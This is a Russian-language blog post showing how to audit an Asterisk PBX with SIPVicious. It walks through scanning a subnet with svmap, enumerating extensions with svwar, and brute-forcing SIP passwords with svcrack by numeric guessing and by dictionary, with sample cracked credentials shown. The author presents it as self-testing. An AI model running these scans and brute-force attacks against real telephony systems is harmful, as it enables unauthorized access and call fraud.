воскресенье, 22 января 2012 г.

Безопастность Asterisk

Не буду рассказывать, как вы должны защищаться от хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.


Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.


Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |



Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |





И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.

Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100 | 100 |
  

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

 ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |



Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)

Комментариев нет:

Отправить комментарий